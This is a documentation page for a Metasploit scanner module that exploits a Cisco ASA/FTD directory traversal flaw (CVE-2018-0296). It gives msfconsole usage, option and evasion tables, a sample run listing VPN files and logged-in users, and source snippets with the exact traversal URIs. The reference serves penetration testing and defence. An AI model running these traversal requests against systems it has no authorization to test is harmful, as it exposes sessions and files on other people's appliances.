Cisco ASA Directory Traversal - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/cisco_directory_traversal metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Cisco ASA Directory Traversal
Module: auxiliary/scanner/http/cisco_directory_traversal
Source code: modules/auxiliary/scanner/http/cisco_directory_traversal.rb
Disclosure date: 2018-06-06
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2018-0296

This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software. It lists the contents of Cisco's VPN web service which includes directories, files, and currently logged in users.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/scanner/http/cisco_directory_traversal
msf auxiliary(cisco_directory_traversal) > show targets
    ... a list of targets ...
msf auxiliary(cisco_directory_traversal) > set TARGET target-id
msf auxiliary(cisco_directory_traversal) > show options
    ... show and set options ...
msf auxiliary(cisco_directory_traversal) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


This module exploits a directory traversal vulnerability on Cisco products running the Adaptive Security Appliance (ASA) software < v9.6 and Firepower Threat Defense (FTD) software < v6.2.3. Sending a specially crafted HTTP request results in viewing the contents of directories that would otherwise require authentication to view.

Vulnerable Application


Cisco ASA software < v9.6 and Cisco FTD software < v6.2.3 running on vulnerable appliances that can be found here

Verification Steps


  1. Install the application
  2. Start msfconsole
  3. Do: use auxiliary/scanner/http/cisco_directory_traversal
  4. Do: set RHOSTS [IP]
  5. Do: run

Scenarios


Tested on Cisco ASA 5505 Series running ASA software v8.2


  msf5 > use auxiliary/scanner/http/cisco_directory_traversal
  msf5 auxiliary(scanner/http/cisco_directory_traversal) > set rhosts 192.168.1.1
  rhosts => 192.168.1.1
  msf5 auxiliary(scanner/http/cisco_directory_traversal) > run

  [+] ///
  [
  {'name':'customization','size':0,'type':'1','mdate':1532972199}
  ,{'name':'bookmarks','size':0,'type':'1','mdate':1532972199}
  ,{'name':'locale','size':0,'type':'1','mdate':1532972197}
  ,{'name':'+CSCOT+','size':0,'type':'1','mdate':1532971872}
  ,{'name':'+CSCOCA+','size':0,'type':'1','mdate':1532971872}
  ,{'name':'+CSCOL+','size':0,'type':'1','mdate':1532971871}
  ,{'name':'admin','size':0,'type':'1','mdate':1532971871}
  ,{'name':'+CSCOU+','size':0,'type':'1','mdate':1532971871}
  ,{'name':'+CSCOE+','size':0,'type':'1','mdate':1532971871}
  ,{'name':'sessions','size':0,'type':'1','mdate':1532971871}

  [+] ///sessions/
  [
  {'name':'32768','size':0,'type':'1','mdate':1533130976}

  [*] Users logged in:
  [+] cisco

  [+] //+CSCOE+
  [
  {'name':'logo.gif','size':0,'type':'0','mdate':1532972377}
  ,{'name':'http_auth.html','size':3317,'type':'0','mdate':1532972377}
  ,{'name':'user_dialog.html','size':2145,'type':'0','mdate':1532972377}
  ,{'name':'localization_inc.lua','size':4495,'type':'0','mdate':1532972377}
  ,{'name':'portal_inc.lua','size':30888,'type':'0','mdate':1532972377}
  ,{'name':'include','size':0,'type':'1','mdate':1532971872}
  ,{'name':'nostcaccess.html','size':497,'type':'0','mdate':1532972377}
  ,{'name':'ask.html','size':2520,'type':'0','mdate':1532972377}
  ,{'name':'no_svc.html','size':1779,'type':'0','mdate':1532972377}
  ,{'name':'svc.html','size':2701,'type':'0','mdate':1532972377}
  ,{'name':'session.js','size':371,'type':'0','mdate':1532972377}
  ,{'name':'useralert.html','size':2526,'type':'0','mdate':1532972377}
  ,{'name':'ping.html','size':4296,'type':'0','mdate':1532972377}
  ,{'name':'help','size':0,'type':'1','mdate':1532971872}
  ,{'name':'app_index.html','size':14531,'type':'0','mdate':1532972377}
  ,{'name':'tlbr','size':1960,'type':'0','mdate':1532972377}
  ,{'name':'portal_forms.js','size':265,'type':'0','mdate':1532972377}
  ,{'name':'logon_forms.js','size':263,'type':'0','mdate':1532972377}
  ,{'name':'win.js','size':247,'type':'0','mdate':1532972377}
  ,{'name':'portal.css','size':4757,'type':'0','mdate':1532972377}
  ,{'name':'portal.js','size':369,'type':'0','mdate':1532972377}
  ,{'name':'sess_update.html','size':267,'type':'0','mdate':1532972377}
  ,{'name':'blank.html','size':255,'type':'0','mdate':1532972377}
  ,{'name':'noportal.html','size':261,'type':'0','mdate':1532972377}
  ,{'name':'portal_ce.html','size':7990,'type':'0','mdate':1532972377}
  ,{'name':'portal.html','size':10999,'type':'0','mdate':1532972377}
  ,{'name':'home','size':0,'type':'1','mdate':1532971872}
  ,{'name':'logon_custom.css','size':499,'type':'0','mdate':1532972377}
  ,{'name':'portal_custom.css','size':315,'type':'0','mdate':1532972377}
  ,{'name':'preview.html','size':259,'type':'0','mdate':1532972377}
  ,{'name':'session_expired','size':0,'type':'0','mdate':1532972377}
  ,{'name':'custom','size':0,'type':'1','mdate':1532971872}
  ,{'name':'portal_elements.html','size':33659,'type':'0','mdate':1532972377}
  ,{'name':'commonspawn.js','size':379,'type':'0','mdate':1532972377}
  ,{'name':'common.js','size':369,'type':'0','mdate':1532972377}
  ,{'name':'appstart.js','size':1777,'type':'0','mdate':1532972377}
  ,{'name':'appstatus','size':1904,'type':'0','mdate':1532972377}
  ,{'name':'relaymonjar.html','size':0,'type':'0','mdate':1532972377}
  ,{'name':'relaymonocx.html','size':0,'type':'0','mdate':1532972377}
  ,{'name':'relayjar.html','size':0,'type':'0','mdate':1532972377}
  ,{'name':'relayocx.html','size':0,'type':'0','mdate':1532972377}
  ,{'name':'portal_img','size':0,'type':'1','mdate':1532971872}
  ,{'name':'color_picker.js','size':381,'type':'0','mdate':1532972377}
  ,{'name':'color_picker.html','size':269,'type':'0','mdate':1532972377}
  ,{'name':'cedhelp.html','size':2819,'type':'0','mdate':1532972377}
  ,{'name':'cedmain.html','size':5084,'type':'0','mdate':1532972377}
  ,{'name':'cedlogon.html','size':4147,'type':'0','mdate':1532972377}
  ,{'name':'cedportal.html','size':2762,'type':'0','mdate':1532972377}
  ,{'name':'cedsave.html','size':2167,'type':'0','mdate':1532972377}
  ,{'name':'cedf.html','size':51675,'type':'0','mdate':1532972377}
  ,{'name':'ced.html','size':51673,'type':'0','mdate':1532972377}
  ,{'name':'lced.html','size':2477,'type':'0','mdate':1532972377}
  ,{'name':'files','size':0,'type':'1','mdate':1532971871}
  ,{'name':'041235123432C2','size':1101,'type':'0','mdate':1532972377}
  ,{'name':'041235123432U2','size':464,'type':'0','mdate':1532972377}
  ,{'name':'pluginlib.js','size':375,'type':'0','mdate':1532972377}
  ,{'name':'shshim','size':1317,'type':'0','mdate':1532972377}
  ,{'name':'do_url','size':0,'type':'0','mdate':1532972377}
  ,{'name':'clear_cache','size':0,'type':'0','mdate':1532972377}
  ,{'name':'connection_failed_form','size':0,'type':'0','mdate':1532972377}
  ,{'name':'apcf','size':0,'type':'0','mdate':1532972377}
  ,{'name':'ucte_forbidden_data','size':0,'type':'0','mdate':1532972377}
  ,{'name':'ucte_forbidden_url','size':0,'type':'0','mdate':1532972377}
  ,{'name':'cookie','size':0,'type':'0','mdate':1532972377}
  ,{'name':'session_password.html','size':648,'type':'0','mdate':1532972377}
  ,{'name':'tunnel_linux.jnlp','size':1663,'type':'0','mdate':1532972377}
  ,{'name':'tunnel_mac.jnlp','size':1659,'type':'0','mdate':1532972377}
  ,{'name':'sdesktop','size':0,'type':'1','mdate':1532971871}
  ,{'name':'gp-gip.html','size':3097,'type':'0','mdate':1532972377}
  ,{'name':'auth.html','size':467,'type':'0','mdate':1532972377}
  ,{'name':'wrong_url.html','size':354,'type':'0','mdate':1532972377}
  ,{'name':'logon_redirect.html','size':1395,'type':'0','mdate':1532972377}
  ,{'name':'logout.html','size':31552,'type':'0','mdate':1532972377}
  ,{'name':'logon.html','size':31517,'type':'0','mdate':1532972377}
  ,{'name':'test_chargen','size':0,'type':'0','mdate':1532972377}

  [*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/cisco_directory_traversal auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/cisco_directory_traversal

msf6 auxiliary(scanner/http/cisco_directory_traversal) > show info

       Name: Cisco ASA Directory Traversal
     Module: auxiliary/scanner/http/cisco_directory_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2018-06-06

Provided by:
  Micha�� Bentkowski
  Yassine Aboukir
  Shelby Pace

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SSL        true             yes       Use SSL
  TARGETURI  /                yes       Path to Cisco installation
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal vulnerability in Cisco's 
  Adaptive Security Appliance (ASA) software and Firepower Threat 
  Defense (FTD) software. It lists the contents of Cisco's VPN web 
  service which includes directories, files, and currently logged in 
  users.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2018-0296
  https://www.exploit-db.com/exploits/44956

Module Options


This is a complete list of options available in the scanner/http/cisco_directory_traversal auxiliary module:

msf6 auxiliary(scanner/http/cisco_directory_traversal) > show options

Module options (auxiliary/scanner/http/cisco_directory_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             yes       Use SSL
   TARGETURI  /                yes       Path to Cisco installation
   VHOST                       no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/cisco_directory_traversal auxiliary module:

msf6 auxiliary(scanner/http/cisco_directory_traversal) > show advanced

Module advanced options (auxiliary/scanner/http/cisco_directory_traversal):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/cisco_directory_traversal module can do:

msf6 auxiliary(scanner/http/cisco_directory_traversal) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/cisco_directory_traversal auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/cisco_directory_traversal) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Could not detect any sessions


Here is a relevant code snippet related to the "Could not detect any sessions" error message:

64:	
65:	  def get_sessions(response)
66:	    session_nos = response.scan(/([0-9]{2,})/)
67:	
68:	    if session_nos.empty?
69:	      print_status("Could not detect any sessions")
70:	      print("\n")
71:	      return
72:	    end
73:	
74:	    print_good(response)

There are no users logged in currently


Here is a relevant code snippet related to the "There are no users logged in currently" error message:

95:	      user_ids.each { |id| print_good(id) }
96:	      print("\n")
97:	      return
98:	    end
99:	
100:	    print_status("There are no users logged in currently")
101:	  end
102:	
103:	  def run
104:	    file_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'
105:	    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'

Failed to reach Cisco web logon service


Here is a relevant code snippet related to the "Failed to reach Cisco web logon service" error message:

106:	    cscoe_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'
107:	
108:	    paths = [file_uri, sessions_uri, cscoe_uri]
109:	
110:	    unless is_accessible?
111:	      fail_with(Failure::NotFound, 'Failed to reach Cisco web logon service')
112:	    end
113:	
114:	    paths.each { |path| list_files(path) }
115:	  end
116:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • MichaÅ‚ Bentkowski
  • Yassine Aboukir
  • Shelby Pace

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.